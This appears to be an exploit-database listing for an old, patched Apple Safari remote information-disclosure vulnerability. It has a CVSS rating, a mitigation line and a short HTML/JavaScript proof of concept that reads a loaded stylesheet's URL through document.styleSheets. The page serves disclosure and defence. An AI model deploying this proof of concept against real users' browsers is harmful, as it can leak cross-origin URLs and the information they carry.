header-logo
Suggest Exploit
vendor:
Safari
by:
7.5
CVSS
HIGH
Information Disclosure
CWE
Product Name: Safari
Affected Version From:
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:

Remote Information Disclosure Vulnerability in Apple Safari

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.

Mitigation:

Apply the latest security patches and updates from Apple.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/37925/info

Apple Safari is prone to a remote information-disclosure vulnerability.

Attackers can exploit this issue to obtain potentially sensitive information that may lead to further attacks.

<link rel="stylesheet" type="text/css" href="http://www.example.com"> Hola <script language="javascript"> setTimeout("alert(document.styleSheets[0].href)", 10000); //setTimeout is used just to wait for page loading </script>